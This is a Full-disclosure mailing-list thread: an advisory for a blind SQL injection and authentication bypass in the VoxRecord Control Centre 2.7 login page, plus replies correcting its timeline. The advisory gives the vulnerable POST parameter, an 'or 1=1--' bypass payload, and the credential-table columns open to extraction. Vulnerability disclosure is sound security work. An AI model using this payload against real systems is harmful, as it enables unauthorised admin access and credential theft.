Re: [Full-disclosure] Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass
Small correction regarding the time line of this disclosure: [Time-line] 14/11/2011 - Vendor notified 2/12/2011 - Vendor response ??? - Vendor patch release 30/11/2011 - Public disclosure Cheers, @drk1wi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass
Correction or not correction, this VoxSmart tool just sucks. How come they are vulnerable to auth bypass with or 1=1--??? Hey, we're in 2012 (almost)...wake up ahaha Cheers antisnatchor On Fri, Dec 2, 2011 at 10:58 AM, Piotr Duszynski pi...@duszynski.eu wrote: Small correction regarding the time line of this disclosure: [Time-line] 14/11/2011 - Vendor notified 2/12/2011 - Vendor response ??? - Vendor patch release 30/11/2011 - Public disclosure Cheers, @drk1wi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- /antisnatchor ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Voxsmart VoxRecord Control Centre - Blind SQLi and auth. bypass
=== VoxRecord Control Centre - version 2.7 Blind SQLi and auth. bypass === Affected Software : Voxsmart - VoxRecord Control Centre v. 2.7 Severity : Critical Local/Remote : Remote Author: Piotr Duszynski @drk1wi [Summary] A blind sqli exists in /vcc/login.php login page. This can be used either for authentication bypass (admin privileges gained) or login:pass extraction from the 'voxsuser' database table. [Vulnerability Details] HTTP POST :/vcc/login.php admin_un=adm[ BLIBD SQL INJECTION]admin_pw=adddm - Authentication bypass: set admin_un to admin'%20or%201%3d1-- - Blind SQLi data extraction: 'voxsuser' table columns +-+++---+++ | email | id | is_loged | password | user_type | username | +-+++---+++ [Time-line] 1/10/2011 - Vendor notified ???- Vendor response ???- Vendor patch release 30/11/2011 - Public disclosure Cheers, @drk1wi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
